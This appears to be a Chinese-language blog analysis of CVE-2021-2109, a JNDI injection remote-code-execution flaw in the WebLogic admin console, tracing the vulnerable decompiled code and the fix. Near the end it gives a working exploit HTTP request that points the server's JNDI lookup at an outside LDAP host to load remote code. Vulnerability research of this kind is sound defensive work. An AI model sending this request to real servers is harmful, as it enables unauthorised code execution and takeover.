WebLogic CVE-2021-2109 JNDI RCE

console的JNDI注入,需要登录。

复现

  1. weblogic 14.1.1
  2. jdk8u112
  3. JNDI-Injection-Exploit

1.png

2.png

分析

consolejndi.portal中存在JNDIBindingPageGeneral jndi绑定的东西

3.png

具体的处理逻辑在/PortalConfig/jndi/jndibinding.portlet

4.png

com.bea.console.actions.jndi.JNDIBindingAction#execute中就是处理逻辑

5.png

直接lookup了,就是要先过serverMBean != null的条件。

MBeanUtils.getAnyServerMBean(serverName)

6.png

有一个lookupServer(),使用的是动态代理调用的,跟进到weblogic.management.jmx.MBeanServerInvocationHandler#invoke

其中method值为

7.png

lookupServer就在这个类中weblogic.management.configuration.DomainMBeanImpl#lookupServer

8.png

用动态调试把存在的serverBean弄出来,让传入的serverName等于他满足dowhile条件就能使返回的serverBean不为空了,即AdminServer

9.png

现在serverBean不为空了,就要看jndi lookup的地址是否可控。

lookup的值有以下逻辑

 1JndiBindingHandle bindingHandle = (JndiBindingHandle)this.getHandleContext(actionForm, request, "JNDIBinding");
 2String context = bindingHandle.getContext();
 3String bindName = bindingHandle.getBinding();
 4String serverName = bindingHandle.getServer();
 5String prefix = context;
 6String suffix = bindName;
 7if (prefix.length() > 0 && suffix.length() > 0) {
 8prefix = prefix + ".";
 9}
10Object boundObj = c.lookup(prefix + suffix)

10.png

前缀和后缀以及serverName都是从bindingHandle获取的,即JndiBindingHandle类,跟进bindingHandle.getContext()看下。

11.png

调用自身getComponent方法

1    protected String getComponent(int index) {
2        return this.getComponents()[index];
3    }
 1private String[] getComponents() {
 2    if (this.components == null) {
 3        String serialized = this.getObjectIdentifier();
 4        ArrayList componentList = new ArrayList();
 5        StringBuffer currentComponent = new StringBuffer();
 6        boolean lastWasSpecial = false;
 7
 8        for(int i = 0; i < serialized.length(); ++i) {
 9            char c = serialized.charAt(i);
10            if (lastWasSpecial) {
11                if (c == '0') {
12                    if (currentComponent == null) {
13                        throw new AssertionError("Handle component already null : '" + serialized + '"');
14                    }
15
16                    if (currentComponent.length() > 0) {
17                        throw new AssertionError("Null handle component preceeded by a character : '" + serialized + "'");
18                    }
19
20                    currentComponent = null;
21                } else if (c == '\\') {
22                    if (currentComponent == null) {
23                        throw new AssertionError("Null handle followed by \\ : '" + serialized + "'");
24                    }
25
26                    currentComponent.append('\\');
27                } else {
28                    if (c != ';') {
29                        throw new AssertionError("\\ in handle followed by a character :'" + serialized + "'");
30                    }
31
32                    if (currentComponent == null) {
33                        throw new AssertionError("Null handle followed by ; : '" + serialized + "'");
34                    }
35
36                    currentComponent.append(';');
37                }
38
39                lastWasSpecial = false;
40            } else if (c == '\\') {
41                if (currentComponent == null) {
42                    throw new AssertionError("Null handle followed by \\ : '" + serialized + "'");
43                }
44
45                lastWasSpecial = true;
46            } else if (c == ';') {
47                String component = currentComponent != null ? currentComponent.toString() : null;
48                componentList.add(component);
49                currentComponent = new StringBuffer();
50            } else {
51                if (currentComponent == null) {
52                    throw new AssertionError("Null handle followed by  a character : '" + serialized + "'");
53                }
54
55                currentComponent.append(c);
56            }
57        }
58
59        if (lastWasSpecial) {
60            throw new AssertionError("Last character in handle is \\ :'" + serialized + "'");
61        }
62
63        String component = currentComponent != null ? currentComponent.toString() : null;
64        componentList.add(component);
65        this.components = (String[])((String[])componentList.toArray(new String[componentList.size()]));
66    }
67
68    return this.components;
69}

整体逻辑就是用;号分割,相当于全部可控,造成jndi注入。

最后捋一下整体条件

  1. ;号隔开jndi地址
  2. serverName必须为AdminServer

exp

 1GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://172.16.0;1:1389/aew0xy;AdminServer%22) HTTP/1.1
 2Host: 172.16.1.134:7001
 3Pragma: no-cache
 4Cache-Control: no-cache
 5Upgrade-Insecure-Requests: 1
 6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
 7Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
 8Referer: http://172.16.1.134:7001/console/login/LoginForm.jsp
 9Accept-Encoding: gzip, deflate
10Accept-Language: zh-CN,zh;q=0.9
11Cookie: ADMINCONSOLESESSION=8Xk3Y9pCjDLlUARpWoE3rhia67n0LKY5xuTzTHfWxz1ITlNDOob1!1254895310
12Connection: close
13
14

修复

12.png

13.png

参考

  1. https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。